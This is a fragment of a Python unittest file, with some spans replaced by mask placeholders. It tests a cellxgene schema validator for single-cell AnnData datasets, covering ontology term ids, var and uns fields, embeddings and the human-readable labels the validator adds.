'[['PATO:0000461']]'. Only 'PATO:0000461' is allowed for 'PATO' term ids.\"\n ])\n <mask token>\n\n def test_organism_ontology_term_id(self):\n \"\"\"\n organism_ontology_term_id categorical with str categories. This MUST be a child of NCBITaxon:33208.\n \"\"\"\n self.validator.adata.obs['organism_ontology_term_id'][0\n ] = 'EFO:0000001'\n self.validator.adata.obs['development_stage_ontology_term_id'][0\n ] = 'unknown'\n self.validator.adata.obs['ethnicity_ontology_term_id'][0] = 'na'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'organism_ontology_term_id' is not a valid ontology term id of 'NCBITaxon'. Only children term ids of 'NCBITaxon:33208' for metazoan are allowed.\"\n ])\n\n def test_tissue_ontology_term_id_base(self):\n \"\"\"\n tissue_ontology_term_id categorical with str categories. This MUST be the term that best describes the tissue\n that this cell was derived from, depending on the type of biological sample:\n \"\"\"\n self.validator.adata.obs['tissue_ontology_term_id'][0] = 'EFO:0000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'tissue_ontology_term_id' is not a valid ontology term id of 'UBERON, CL'.\"\n ])\n <mask token>\n\n def test_tissue_ontology_term_id_organoid(self):\n \"\"\"\n Organoid - MUST be an UBERON term appended with \" (organoid)\"\n \"\"\"\n self.validator.adata.obs['tissue_ontology_term_id'][0\n ] = 'CL:0000057 (ORGANOID)'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'CL:0000057 (ORGANOID)' in 'tissue_ontology_term_id' is not a valid ontology term id of 'UBERON, CL'.\"\n ])\n\n def test_sex_ontology_term_id(self):\n \"\"\"\n sex_ontology_term_id categorical with str categories.\n This MUST be a child of PATOPATO:0001894 for phenotypic sex or \"unknown\" if unavailable\n \"\"\"\n self.validator.adata.obs['sex_ontology_term_id'][0] = 'EFO:0000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'sex_ontology_term_id' is not a valid ontology term id of 'PATO'. Only 'PATO:0000383', 'PATO:0000384', 'PATO:0001340', or 'unknown' are allowed.\"\n ])\n <mask token>\n\n\nclass TestVar(unittest.TestCase):\n \"\"\"\n Fail cases in adata.var and adata.raw.var\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_var_and_raw_var_same_index(self):\n \"\"\"\n var.index MUST contain unique identifiers for features. raw.var.index MUST be identical to var.index.\n \"\"\"\n var = Validator.getattr_anndata(self.validator.adata, 'var')\n new_index = list(var.index)\n tmp = new_index[0]\n new_index[0] = new_index[1]\n new_index[1] = tmp\n var.set_index(pd.Index(new_index), inplace=True)\n tmp = var.iloc[0, :].copy()\n var.iloc[0, :] = var.iloc[1, :].copy()\n var.iloc[1, :] = tmp\n self.validator.validate_adata()\n print('FOO', self.validator.errors)\n self.assertEqual(self.validator.errors, [\n \"ERROR: Index of 'raw.var' is not identical to index of 'var'.\"])\n\n def test_check_unique_var(self):\n \"\"\"\n var.index MUST contain unique ENSEMBL gene identifiers for features.\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[1] = new_index[0]\n component.set_index(pd.Index(new_index), inplace=True)\n component.iloc[1, :] = component.iloc[0, :]\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: Column 'index' in dataframe '{component_name}' is not unique.\"\n ])\n\n def test_column_presence(self):\n \"\"\"\n var is a pandas.DataFrame. Curators MUST annotate the following columns in the obs dataframe.\n feature_is_filtered must not be in raw.var, and it's only checked in var\n \"\"\"\n columns = ['feature_is_filtered', 'feature_biotype']\n for component_name in ['var', 'raw.var']:\n for column in columns:\n if (column == 'feature_is_filtered' and component_name ==\n 'raw.var'):\n continue\n with self.subTest(component_name=component_name, column=column\n ):\n self.validator.errors = []\n self.validator.adata = examples.adata.copy()\n component = Validator.getattr_anndata(self.validator.\n adata, component_name)\n component.drop(column, axis=1, inplace=True)\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: Dataframe '{component_name}' is missing column '{column}'.\"\n ])\n\n def test_feature_is_filtered(self):\n \"\"\"\n feature_is_filtered bool. This MUST be True if the feature was filtered out in the final matrix (X)\n but is present in the raw matrix (raw.X). The value for all cells of the given feature in the\n final matrix MUST be 0.\n\n Otherwise, this MUST be False.\n \"\"\"\n self.validator.adata.var['feature_is_filtered'][0] = True\n for i in range(self.validator.adata.X.shape[0]):\n self.validator.adata.X[i, 0] = 0\n self.validator.adata.X[0, 0] = 1\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Some features are 'True' in 'feature_is_filtered' of dataframe 'var', but there are 1 non-zero values in the corresponding columns of the matrix 'X'. All values for these features must be 0.\"\n ])\n\n def test_columns_not_in_raw_var(self):\n \"\"\"\n Curators MUST annotate the following column only in the var dataframe.\n This column MUST NOT be present in raw.var:\n feature_is_filtered\n \"\"\"\n self.validator.adata.raw = self.validator.adata\n self.validator.adata.uns['X_normalization'] = 'CPM'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Column 'feature_is_filtered' must not be present in 'raw.var'.\"\n ])\n\n def test_feature_id_wrong_format(self):\n \"\"\"\n feature_id (var.index) str.\n If the feature_biotype is \"gene\" then this MUST be an ENSEMBL term.\n If the feature_biotype is \"spike-in\" then this MUST be an ERCC Spike-In identifier.\n\n This tests the case of an ID with an incorrect format \"ENSEBML_NOGENE\"\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[0] = 'ENSEBML_NOGENE'\n component.set_index(pd.Index(new_index), inplace=True)\n component['feature_biotype'][0] = 'gene'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: Could not infer organism from feature ID 'ENSEBML_NOGENE' in '{component_name}', make sure it is a valid ID.\"\n ])\n\n def test_feature_id_non_existent_ensembl(self):\n \"\"\"\n feature_id (var.index) str.\n If the feature_biotype is \"gene\" then this MUST be an ENSEMBL term.\n If the feature_biotype is \"spike-in\" then this MUST be an ERCC Spike-In identifier.\n\n This tests the case of an ENSEMBL ID that has the right format but doesn't exist\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[0] = 'ENSG000'\n component.set_index(pd.Index(new_index), inplace=True)\n component['feature_biotype'][0] = 'gene'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: 'ENSG000' is not a valid feature ID in '{component_name}'.\"\n ])\n\n def test_feature_id_non_existent_ercc(self):\n \"\"\"\n feature_id (var.index) str.\n If the feature_biotype is \"gene\" then this MUST be an ENSEMBL term.\n If the feature_biotype is \"spike-in\" then this MUST be an ERCC Spike-In identifier.\n\n This tests the case of an ERCC ID that has the right format but doesn't exist\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[0] = 'ERCC-000000'\n component.set_index(pd.Index(new_index), inplace=True)\n component['feature_biotype'][0] = 'spike-in'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: 'ERCC-000000' is not a valid feature ID in '{component_name}'.\"\n ])\n\n\nclass TestUns(unittest.TestCase):\n \"\"\"\n Fail cases in adata.uns\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_required_fields_schema_version(self):\n \"\"\"\n Curators MUST annotate `schema_version` and values in uns (schema_version)\n \"\"\"\n del self.validator.adata.uns['schema_version']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: adata has no schema definition in 'adata.uns'. Validation cannot be performed.\"\n ])\n\n def test_required_fields_title(self):\n \"\"\"\n Curators MUST annotate `schema_version` and values in uns (title)\n \"\"\"\n del self.validator.adata.uns['title']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'title' in 'uns' is not present.\"])\n\n def test_required_fields_X_normalization(self):\n \"\"\"\n Curators MUST annotate `schema_version` and values in uns (X_normalization)\n \"\"\"\n del self.validator.adata.uns['X_normalization']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'X_normalization' in 'uns' is not present.\"])\n\n def test_leading_trailing_double_spaces_in_strings(self):\n \"\"\"\n The following sequences MUST NOT appear in str types documented in the schema:\n Leading control or space separators - ” This is an example”\n Trailing control or space separators - “This is an example ”\n Multiple (internal) control or space separators - \"This is an example\"\n \"\"\"\n self.validator.adata.uns['title'] = ' There is a leading space'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: ' There is a leading space' in 'uns['title']' is not valid, it contains leading spaces.\"\n ])\n self.validator.adata.uns['title'] = 'There is a trailing space '\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'There is a trailing space ' in 'uns['title']' is not valid, it contains trailing spaces.\"\n ])\n self.validator.adata.uns['title'] = 'There are double spaces'\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'There are double spaces' in 'uns['title']' is not valid, it contains double spaces.\"\n ])\n\n def test_schema_version(self):\n \"\"\"\n Schema_version, This MUST be \"2.0.0\".\n \"\"\"\n self.validator.adata.uns['schema_version'] = '1.0.0'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Schema version '1.0.0' is not supported. Current supported versions: '['2.0.0']'. Validation cannot be performed.\"\n ])\n\n def test_title(self):\n \"\"\"\n Title MUST be a string\n \"\"\"\n self.validator.adata.uns['title'] = ['title']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['title']' in 'uns['title']' is not valid, it must be a string.\"\n ])\n\n def test_X_normalization_is_str(self):\n \"\"\"\n X_normalization str.\n \"\"\"\n self.validator.adata.uns['X_normalization'] = ['normalization']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['normalization']' in 'uns['X_normalization']' is not valid, it must be a string.\"\n ])\n\n def test_X_normalization_not_raw(self):\n \"\"\"\n X_normalization str. This SHOULD describe the method used to normalize the data stored in AnnData X.\n If data in X are raw, this SHOULD be \"none\".\n\n FAIL CASE for when X_normalization was set to \"none\" but X may not be raw data\n \"\"\"\n del self.validator.adata.raw\n self.validator.adata.uns['X_normalization'] = 'none'\n self.validator.validate_adata()\n print('FOO', self.validator.warnings)\n self.assertEqual(self.validator.warnings, [\n \"WARNING: uns['X_normalization'] is 'none', there is no 'raw.X' and 'X' doesn't appear to have raw counts (integers)\"\n ])\n\n def test_batch_condition_is_list(self):\n \"\"\"\n batch_condition list[str]\n \"\"\"\n self.validator.adata.uns['batch_condition'] = numpy.array(self.\n validator.adata.uns['batch_condition'])\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [])\n self.validator.adata.uns['batch_condition'\n ] = 'cell_type_ontology_term_id'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'cell_type_ontology_term_id' in 'uns['batch_condition']' is not valid, it must be a list or numpy array.\"\n ])\n\n def test_batch_condition_is_column_from_obs(self):\n \"\"\"\n batch_condition list[str]. str values MUST refer to cell metadata keys in obs.\n \"\"\"\n self.validator.adata.uns['batch_condition'] = ['NO_COLUMN']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Value 'NO_COLUMN' of list 'batch_condition' is not a column in 'adata.obs'.\"\n ])\n\n def test_default_embedding_is_str(self):\n \"\"\"\n Default_embedding str.\n \"\"\"\n self.validator.adata.uns['default_embedding'] = ['X_umap']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['X_umap']' in 'uns['default_embedding']' is not valid, it must be a string.\"\n ])\n\n def test_default_embedding_is_key_from_obsm(self):\n \"\"\"\n Default_embedding str. The value MUST match a key to an embedding in obsm\n \"\"\"\n self.validator.adata.uns['default_embedding'] = 'X_other'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'X_other' in 'uns['default_embedding']' is not valid, it must be a key of 'adata.obsm'.\"\n ])\n\n def test_X_approximate_distribution_is_str(self):\n \"\"\"\n X_approximate_distribution str. The value MUST be \"count\" [...] or \"normal\".\n Note that `normal` is tested in the happy path test case using `good_uns`.\n \"\"\"\n self.validator.adata.uns['X_approximate_distribution'] = 'count'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [])\n self.validator.adata.uns['X_approximate_distribution'] = ['count']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['count']' in 'uns['X_approximate_distribution']' is not valid, it must be a string.\"\n ])\n\n def test_X_approximate_distribution_is_valid(self):\n \"\"\"\n X_approximate_distribution str. The value MUST be \"count\" [...] or \"normal\"\n \"\"\"\n self.validator.adata.uns['X_approximate_distribution'] = 'COUNT'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'COUNT' in 'uns['X_approximate_distribution']' is not valid. Allowed terms: ['count', 'normal'].\"\n ])\n\n\nclass TestObsm(unittest.TestCase):\n \"\"\"\n Fail cases for adata.obsm\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_obsm_values_ara_numpy(self):\n \"\"\"\n values in obsm MUST be a numpy.ndarray\n \"\"\"\n self.validator.adata.obsm['X_tsne'] = pd.DataFrame(self.validator.\n adata.obsm['X_umap'], index=self.validator.adata.obs_names)\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: All embeddings have to be of 'numpy.ndarray' type, 'adata.obsm['X_tsne']' is <class 'pandas.core.frame.DataFrame'>').\"\n ])\n\n def test_obsm_values_at_least_one_X(self):\n \"\"\"\n At least one key for the embedding MUST be prefixed with \"X_\"\n \"\"\"\n self.validator.adata.obsm['umap'] = self.validator.adata.obsm['X_umap']\n self.validator.adata.uns['default_embedding'] = 'umap'\n del self.validator.adata.obsm['X_umap']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: At least one embedding in 'obsm' has to have a key with an 'X_' prefix.\"\n ])\n\n def test_obsm_shape(self):\n \"\"\"\n Curators MUST annotate one or more two-dimensional (m >= 2) embeddings\n \"\"\"\n self.validator.adata.obsm['X_umap'] = numpy.delete(self.validator.\n adata.obsm['X_umap'], 0, 1)\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: All embeddings must have as many rows as cells, and at least two columns.'adata.obsm['X_umap']' has shape of '(2, 1)'.\"\n ])\n\n\nclass TestAddingLabels(unittest.TestCase):\n \"\"\"\n Tests the addition of labels from IDs based on schema specification. The test is done by comparing manually\n created dataframes (positive control) against the ones produced by the validator\n \"\"\"\n\n @classmethod\n def setUpClass(cls):\n cls.adata_with_labels = examples.adata_with_labels\n validator = Validator()\n validator.adata = examples.adata.copy()\n validator.validate_adata()\n cls.label_writer = AnnDataLabelAppender(validator)\n cls.label_writer._add_labels()\n\n def test_var_added_labels(self):\n \"\"\"\n When a dataset is uploaded, cellxgene Data Portal MUST automatically add the matching human-readable\n name for the corresponding feature identifier and the inferred NCBITaxon term for the reference organism\n to the var dataframe. Curators MUST NOT annotate the following columns:\n\n - feature_name. If the feature_biotype is \"gene\" then this MUST be the human-readable ENSEMBL gene\n name assigned to the feature_id. If the feature_biotype is \"spike-in\" then this MUST be the\n ERCC Spike-In identifier appended with \" spike-in control\".\n - feature_reference. This MUST be the reference organism for a feature:\n Homo sapiens\t\"NCBITaxon:9606\"\n Mus musculus\t\"NCBITaxon:10090\"\n SARS-CoV-2\t\"NCBITaxon:2697049\"\n ERCC Spike-Ins\t\"NCBITaxon:32630\"\n \"\"\"\n for column in ['feature_name', 'feature_reference']:\n expected_column = self.adata_with_labels.var[column]\n obtained_column = self.label_writer.adata.var[column]\n for i, j in zip(expected_column.tolist(), obtained_column.tolist()\n ):\n with self.subTest(i=i, j=j):\n self.assertEqual(i, j)\n\n def test_obs_added_labels(self):\n \"\"\"\n When a dataset is uploaded, the cellxgene Data Portal MUST automatically add the matching human-readable\n name for the corresponding ontology term to the obs dataframe.\n Curators MUST NOT annotate the following columns.\n\n - assay. categorical with str categories. This MUST be the human-readable name assigned to the value\n of assay_ontology_term_id. Any clarifying text enclosed in parentheses and appended to\n assay_ontology_term_id MUST be appended to assay.\n - cell_type. categorical with str categories. This MUST be the human-readable name assigned to the value\n of cell_type_ontology_term_id.\n - development_stage. categorical with str categories. This MUST be \"unknown\" if set in\n development_stage_ontology_term_id; otherwise, this MUST be the human-readable name assigned to\n the value of development_stage_ontology_term_id.\n - disease. categorical with str categories. This MUST be the human-readable name assigned to\n the value of disease_ontology_term_id.\n - ethnicity. categorical with str categories. This MUST be \"na\" or \"unknown\" if\n set in ethnicity_ontology_term_id; otherwise, this MUST be the human-readable\n name assigned to the value of ethnicity_ontology_term_id.\n - organism. categorical with str categories. This MUST be the human-readable name assigned\n to the value of organism_ontology_term_id.\n - sex. categorical with str categories. This MUST be \"unknown\" if set in sex_ontology_term_id;\n otherwise, this MUST be the human-readable name assigned to the value of sex_ontology_term_id.\n - tissue. categorical with str categories. This MUST be the human-readable name assigned to the\n value of tissue_ontology_term_id. \" (cell culture)\" or \" (organoid)\" MUST\n be appended if present in tissue_ontology_term_id.\n \"\"\"\n for column in ['assay', 'cell_type', 'development_stage', 'disease',\n 'ethnicity', 'organism', 'sex', 'tissue']:\n expected_column = self.adata_with_labels.obs[column]\n obtained_column = self.label_writer.adata.obs[column]\n for i, j in zip(expected_column.tolist(), obtained_column.tolist()\n ):\n with self.subTest(i=i, j=j):\n self.assertEqual(i, j)\n",
"step-4": "<mask token>\n\n\nclass TestObs(unittest.TestCase):\n <mask token>\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_column_presence(self):\n \"\"\"\n obs is a pandas.DataFrame. Curators MUST annotate the following columns in the obs dataframe.\n \"\"\"\n columns = ['assay_ontology_term_id',\n 'development_stage_ontology_term_id',\n 'disease_ontology_term_id', 'ethnicity_ontology_term_id',\n 'is_primary_data', 'sex_ontology_term_id',\n 'tissue_ontology_term_id']\n for column in columns:\n with self.subTest(column=column):\n self.validator.errors = []\n self.validator.adata = examples.adata.copy()\n self.validator.adata.obs.drop(column, axis=1, inplace=True)\n self.validator.adata.uns.pop('batch_condition')\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: Dataframe 'obs' is missing column '{column}'.\"])\n\n def test_column_presence_organism(self):\n \"\"\"\n obs is a pandas.DataFrame. Curators MUST annotate the following columns in the obs dataframe.\n\n A separate check is need for organism_ontology_term_id because removing from anndata results in multiple\n errors given that other columns depend on its presence\n \"\"\"\n self.validator.adata.obs.drop('organism_ontology_term_id', axis=1,\n inplace=True)\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Dataframe 'obs' is missing column 'organism_ontology_term_id'.\"\n ,\n \"ERROR: Checking values with dependencies failed for adata.obs['ethnicity_ontology_term_id'], this is likely due to missing dependent column in adata.obs.\"\n ,\n \"ERROR: Checking values with dependencies failed for adata.obs['development_stage_ontology_term_id'], this is likely due to missing dependent column in adata.obs.\"\n ])\n\n def test_obsolete_term_id(self):\n \"\"\"\n Terms documented as obsolete in an ontology MUST NOT be used. For example, EFO:0009310\n for obsolete_10x v2 was marked as obsolete in EFO version 3.31.0 and replaced by\n EFO:0009899 for 10x 3' v2.\n\n https://www.ebi.ac.uk/ols/ontologies/efo/terms?short_form=EFO_0009310\n \"\"\"\n self.validator.adata.obs['assay_ontology_term_id'][0] = 'EFO:0009310'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0009310' in 'assay_ontology_term_id' is a deprecated term id of 'EFO'.\"\n ,\n \"ERROR: 'EFO:0009310' in 'assay_ontology_term_id' is not a child term id of '[['EFO:0002772', 'EFO:0010183']]'.\"\n ])\n\n def test_assay_ontology_term_id(self):\n \"\"\"\n assay_ontology_term_id categorical with str categories.\n This MUST be an EFO term and either child of \"EFO:0002772\" or \"EFO:0010183\"\n If there is not an exact match for the assay, clarifying text MAY be enclosed in parentheses and appended to\n the most accurate term. For example, the sci-plex assay could be curated as \"EFO:0010183 (sci-plex)\"\n \"\"\"\n self.validator.adata.obs['assay_ontology_term_id'][0] = 'CL:000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'CL:000001' in 'assay_ontology_term_id' is not a valid ontology term id of 'EFO'.\"\n ,\n \"ERROR: 'CL:000001' in 'assay_ontology_term_id' is not a child term id of '[['EFO:0002772', 'EFO:0010183']]'.\"\n ])\n self.validator.adata.obs['assay_ontology_term_id'][0] = 'EFO:0000001'\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'assay_ontology_term_id' is not a child term id of '[['EFO:0002772', 'EFO:0010183']]'.\"\n ])\n self.validator.adata.obs['assay_ontology_term_id'][0\n ] = 'EFO:0010183 sci-plex'\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0010183 sci-plex' in 'assay_ontology_term_id' is not a valid ontology term id of 'EFO'.\"\n ,\n \"ERROR: 'EFO:0010183 sci-plex' in 'assay_ontology_term_id' is not a child term id of '[['EFO:0002772', 'EFO:0010183']]'.\"\n ])\n\n def test_cell_type_ontology_term_id(self):\n \"\"\"\n cell_type_ontology_term_id categorical with str categories. This MUST be a CL term.\n \"\"\"\n self.validator.adata.obs['cell_type_ontology_term_id'][0\n ] = 'EFO:0000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'cell_type_ontology_term_id' is not a valid ontology term id of 'CL'.\"\n ])\n\n def test_development_stage_ontology_term_id_human(self):\n \"\"\"\n development_stage_ontology_term_id categorical with str categories. If unavailable, this MUST be \"unknown\".\n If organism_ontolology_term_id is \"NCBITaxon:9606\" for Homo sapiens,\n this MUST be the most accurate HsapDv term.\n \"\"\"\n self.validator.adata.obs['organism_ontology_term_id'][0\n ] = 'NCBITaxon:9606'\n self.validator.adata.obs['development_stage_ontology_term_id'][0\n ] = 'EFO:0000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is not a valid ontology term id of 'HsapDv'. When 'organism_ontology_term_id' is 'NCBITaxon:9606' (Homo sapiens), 'development_stage_ontology_term_id' MUST be a term id of 'HsapDv' or unknown.\"\n ])\n\n def test_development_stage_ontology_term_id_mouse(self):\n \"\"\"\n If organism_ontolology_term_id is \"NCBITaxon:10090\" for Mus musculus,\n this MUST be the most accurate MmusDv term\n \"\"\"\n self.validator.adata.obs['organism_ontology_term_id'][0\n ] = 'NCBITaxon:10090'\n self.validator.adata.obs['development_stage_ontology_term_id'][0\n ] = 'EFO:0000001'\n self.validator.adata.obs['ethnicity_ontology_term_id'][0] = 'na'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is not a valid ontology term id of 'MmusDv'. When 'organism_ontology_term_id' is 'NCBITaxon:10090' (Mus musculus), 'development_stage_ontology_term_id' MUST be a term id of 'MmusDv' or unknown.\"\n ])\n\n def test_development_stage_ontology_term_id_all_species(self):\n \"\"\"\n All other it MUST be children of UBERON:0000105 and not UBERON:0000071\n \"\"\"\n self.validator.adata.obs['organism_ontology_term_id'][0\n ] = 'NCBITaxon:10114'\n self.validator.adata.obs['development_stage_ontology_term_id'][0\n ] = 'EFO:0000001'\n self.validator.adata.obs['ethnicity_ontology_term_id'][0] = 'na'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is not a valid ontology term id of 'UBERON'. When 'organism_ontology_term_id' is not 'NCBITaxon:10090' nor 'NCBITaxon:9606', 'development_stage_ontology_term_id' MUST be a child term id of 'UBERON:0000105' excluding 'UBERON:0000071', or unknown.\"\n ,\n \"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is not a child term id of '[['UBERON:0000105']]'. When 'organism_ontology_term_id' is not 'NCBITaxon:10090' nor 'NCBITaxon:9606', 'development_stage_ontology_term_id' MUST be a child term id of 'UBERON:0000105' excluding 'UBERON:0000071', or unknown.\"\n ])\n self.validator.errors = []\n self.validator.adata.obs['organism_ontology_term_id'][0\n ] = 'NCBITaxon:10114'\n self.validator.adata.obs['development_stage_ontology_term_id'][0\n ] = 'UBERON:0000071'\n self.validator.adata.obs['ethnicity_ontology_term_id'][0] = 'na'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'UBERON:0000071' in 'development_stage_ontology_term_id' is not allowed'. When 'organism_ontology_term_id' is not 'NCBITaxon:10090' nor 'NCBITaxon:9606', 'development_stage_ontology_term_id' MUST be a child term id of 'UBERON:0000105' excluding 'UBERON:0000071', or unknown.\"\n ])\n\n def test_disease_ontology_term_id(self):\n \"\"\"\n disease_ontology_term_id categorical with str categories. This MUST be a MONDO term or\n PATO:0000461 for normal or healthy.\n \"\"\"\n self.validator.adata.obs['disease_ontology_term_id'][0] = 'EFO:0000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'disease_ontology_term_id' is not a valid ontology term id of 'MONDO, PATO'. Only 'PATO:0000461' is allowed for 'PATO' term ids.\"\n ])\n self.validator.errors = []\n self.validator.adata.obs['disease_ontology_term_id'][0\n ] = 'PATO:0001894'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'PATO:0001894' in 'disease_ontology_term_id' is not an allowed term: '[['PATO:0000461']]'. Only 'PATO:0000461' is allowed for 'PATO' term ids.\"\n ])\n\n def test_ethnicity_ontology_term_id(self):\n \"\"\"\n ethnicity_ontology_term_id categorical with str categories.\n If organism_ontolology_term_id is \"NCBITaxon:9606\" for Homo sapiens,\n this MUST be either a HANCESTRO term or \"unknown\" if unavailable.\n Otherwise, for all other organisms this MUST be \"na\".\n \"\"\"\n self.validator.adata.obs['organism_ontology_term_id'][0\n ] = 'NCBITaxon:9606'\n self.validator.adata.obs['ethnicity_ontology_term_id'][0\n ] = 'EFO:0000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'ethnicity_ontology_term_id' is not a valid ontology term id of 'HANCESTRO'. When 'organism_ontology_term_id' is 'NCBITaxon:9606' (Homo sapiens), ethnicity_ontology_term_id MUST be a term id of 'HANCESTRO' or 'unknown'.\"\n ])\n self.validator.errors = []\n self.validator.adata.obs['organism_ontology_term_id'][0\n ] = 'NCBITaxon:10090'\n self.validator.adata.obs['development_stage_ontology_term_id'][0\n ] = 'MmusDv:0000003'\n self.validator.adata.obs['ethnicity_ontology_term_id'][0\n ] = 'EFO:0000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'ethnicity_ontology_term_id' is not a valid value of 'ethnicity_ontology_term_id'. When 'organism_ontology_term_id' is NOT 'NCBITaxon:9606' (Homo sapiens), ethnicity_ontology_term_id MUST be 'na'.\"\n ])\n\n def test_organism_ontology_term_id(self):\n \"\"\"\n organism_ontology_term_id categorical with str categories. This MUST be a child of NCBITaxon:33208.\n \"\"\"\n self.validator.adata.obs['organism_ontology_term_id'][0\n ] = 'EFO:0000001'\n self.validator.adata.obs['development_stage_ontology_term_id'][0\n ] = 'unknown'\n self.validator.adata.obs['ethnicity_ontology_term_id'][0] = 'na'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'organism_ontology_term_id' is not a valid ontology term id of 'NCBITaxon'. Only children term ids of 'NCBITaxon:33208' for metazoan are allowed.\"\n ])\n\n def test_tissue_ontology_term_id_base(self):\n \"\"\"\n tissue_ontology_term_id categorical with str categories. This MUST be the term that best describes the tissue\n that this cell was derived from, depending on the type of biological sample:\n \"\"\"\n self.validator.adata.obs['tissue_ontology_term_id'][0] = 'EFO:0000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'tissue_ontology_term_id' is not a valid ontology term id of 'UBERON, CL'.\"\n ])\n\n def test_tissue_ontology_term_id_cell_culture(self):\n \"\"\"\n Cell Culture - MUST be a CL term appended with \" (cell culture)\"\n \"\"\"\n self.validator.adata.obs['tissue_ontology_term_id'][0\n ] = 'CL:0000057 (CELL culture)'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'CL:0000057 (CELL culture)' in 'tissue_ontology_term_id' is not a valid ontology term id of 'UBERON, CL'.\"\n ])\n\n def test_tissue_ontology_term_id_organoid(self):\n \"\"\"\n Organoid - MUST be an UBERON term appended with \" (organoid)\"\n \"\"\"\n self.validator.adata.obs['tissue_ontology_term_id'][0\n ] = 'CL:0000057 